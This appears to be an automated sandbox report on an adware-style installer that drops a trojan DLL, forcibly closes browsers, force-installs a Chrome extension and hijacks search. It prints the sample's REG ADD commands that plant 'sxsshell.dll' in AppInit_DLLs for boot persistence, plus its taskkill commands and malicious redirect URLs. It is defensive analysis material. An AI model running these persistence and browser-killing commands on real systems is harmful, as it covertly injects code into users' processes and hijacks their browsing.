Source:	Binary string: archiveint.pdb source: xcopy.exe, xcopy.exe, 00000015.00000002.932059653.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934179025.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942185615.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979649233.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024705770.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035316144.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068856259.000007FEF9025000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: E:\work\chrome_extension_auto_install\SetupUnpackNewRealFixReload\ExtDll\x64\Release\ext.pdb source: xcopy.exe, 00000015.00000002.932047910.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000017.00000002.934166286.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001C.00000002.942180233.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 0000001E.00000002.979641480.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000020.00000002.1024700223.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000022.00000002.1035310663.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp, xcopy.exe, 00000024.00000002.1068847691.000007FEF9023000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

Obfuscated command line found

Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT	Jump to behavior

Source: $RDGU87D.exe	Static PE information: section name: .didata
Source: $RDGU87D.tmp.1.dr	Static PE information: section name: .didata
Source: $RDGU87D.tmp.3.dr	Static PE information: section name: .didata

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe	File created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\$RDGU87D.exe	File created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	File created: C:\Windows\System32\is-T05I8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	File created: C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	File created: C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	File created: C:\Windows\system32\sxsshell.dll (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	File created: C:\Windows\System32\is-T05I8.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	File created: C:\Windows\system32\sxsshell.dll (copy)			Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System32\reg.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs

Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\taskkill.exe TID: 2120	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1056	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1256	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 2868	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1424	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskkill.exe TID: 1424	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Dropped PE file which has not been started: C:\Windows\System32\is-T05I8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Windows\System32\xcopy.exe

API coverage: 3.3 %

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp

Process information queried: ProcessInformation

Jump to behavior

Source: $RDGU87D.tmp, 00000004.00000003.930369243.0000000000374000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\xcopy.exe

Code function: 21_2_000007FEF90217C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,__crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,__crt_debugger_hook,GetCurrentProcess,TerminateProcess,

21_2_000007FEF90217C0

Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\xcopy.exe

21_2_000007FEF90217C0

Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /T	Jump to behavior

Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	Process created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT	Jump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f	Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Code function: 21_2_000007FEF9021F90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

21_2_000007FEF9021F90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	23 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	23 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Scripting	Logon Script (Windows)	Logon Script (Windows)	1 Modify Registry	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Virtualization/Sandbox Evasion	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 System Owner/User Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Scripting	DCSync	3 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
$RDGU87D.exe	47%	ReversingLabs	Win32.PUA.Presenoker
$RDGU87D.exe	60%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-2065N.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp	0%	ReversingLabs
C:\Windows\System32\is-T05I8.tmp	42%	ReversingLabs	Win64.Trojan.Generic
C:\Windows\system32\sxsshell.dll (copy)	42%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://smashbrowser.com	1%	Virustotal		Browse
https://www.remobjects.com/ps	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
https://searchesmia.com/bingchr4?q=	100%	Avira URL Cloud	malware
https://smashbrowser.com/welcome2.phpl	0%	Avira URL Cloud	safe
https://smashbrowser.com	0%	Avira URL Cloud	safe
https://offerszzzz.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	0%	Avira URL Cloud	safe
https://chrome.comiR	0%	Avira URL Cloud	safe
https://smashaff.com/redirect?&url=	100%	Avira URL Cloud	malware
https://chrome.com$https://chrome.com$https://chrome.com	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.php-1	0%	Avira URL Cloud	safe
https://chrome.com1R	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.phpA	0%	Avira URL Cloud	safe
https://chrome.com9P	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.phpO	0%	Avira URL Cloud	safe
https://getfiles.wiki/favicon.ico	0%	Avira URL Cloud	safe
https://getfiles.wiki/redirect.php	0%	Avira URL Cloud	safe
https://offersss.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.url	0%	Avira URL Cloud	safe
https://exturl.com/r.php?key=pvwarw3	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.php2F	0%	Avira URL Cloud	safe
https://smashbrowser.com/welcome2.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
smashbrowser.com	188.114.97.3	true	false	unknown
a.nel.cloudflare.com	35.190.80.1	true	false	high
accounts.google.com	172.217.168.77	true	false	high
api4.ipify.org	64.185.227.155	true	false	high
c-0001.c-msedge.net	13.107.4.50	true	false	unknown
getfiles.wiki	188.114.97.3	true	false	unknown
t.dtscout.com	141.101.120.11	true	false	high
offerszzzz.click	38.128.66.115	true	false	unknown
46-105-201-240.any.cdn.anycast.me	46.105.201.240	true	false	unknown
ocsps.ssl.com	100.24.223.135	true	false	high
s4.histats.com	54.39.156.32	true	false	high
e.dtscout.com	141.101.120.11	true	false	high
clients.l.google.com	142.250.203.110	true	false	high
offersss.click	38.128.66.115	true	false	unknown
exturl.com	38.128.66.115	true	false	unknown
clients2.google.com	unknown	unknown	false	high
api.ipify.org	unknown	unknown	false	high
s10.histats.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=	false		unknown
https://offerszzzz.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/?format=jsonp&callback=getIP	false		high
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://s10.histats.com/js15_as.js	false		high
https://a.nel.cloudflare.com/report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb	false		high
https://e.dtscout.com/e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php	false		high
https://t.dtscout.com/pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.c	false		high
https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=	false		unknown
https://getfiles.wiki/favicon.ico	false	Avira URL Cloud: safe	unknown
https://offersss.click/r.php?payout=OPTIONAL&cnv_id=OPTIONAL	false	Avira URL Cloud: safe	unknown
https://getfiles.wiki/redirect.php	false	Avira URL Cloud: safe	unknown
https://s4.histats.com/stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@w	false		high
https://exturl.com/r.php?key=pvwarw3	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc	false		high
https://s4.histats.com/stats/e.php?4708787&@Ab&@R40431&@w	false		high
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://smashbrowser.com/welcome2.php	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	$RDGU87D.exe	false		high
https://searchesmia.com/bingchr4?q=	xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, is-R5QFD.tmp.4.dr, background.js.30.dr, background.js.28.dr, background.js.34.dr, background.js.21.dr, background.js.32.dr, background.js.23.dr	true	Avira URL Cloud: malware	unknown
https://smashbrowser.com/welcome2.phpl	$RDGU87D.tmp, 00000004.00000003.930369243.000000000035C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://smashbrowser.com	$RDGU87D.tmp, 00000004.00000003.931574561.0000000002046000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.inkscape.org/)	xcopy.exe, 00000015.00000002.931823166.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000017.00000002.933959570.00000000002FE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001C.00000002.942109867.000000000029E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 0000001E.00000002.979567606.000000000045E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000020.00000002.1024590977.000000000037E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000022.00000002.1035190360.00000000002AE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000024.00000002.1068566490.000000000022E000.00000004.00000020.00020000.00000000.sdmp, logo.svg.21.dr, logo.svg.34.dr, logo.svg.32.dr, logo.svg.30.dr, logo.svg.28.dr, logo.svg.23.dr	false		high
http://ocsps.ssl.com0	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false	URL Reputation: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false		high
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_	$RDGU87D.tmp, 00000004.00000002.932966802.000000000017D000.00000004.00000010.00020000.00000000.sdmp, $RDGU87D.exe	false		high
https://chrome.comiR	$RDGU87D.tmp, 00000002.00000003.919834870.0000000002154000.00000004.00001000.00020000.00000000.sdmp, $RDGU87D.tmp, 00000004.00000003.931574561.0000000002054000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
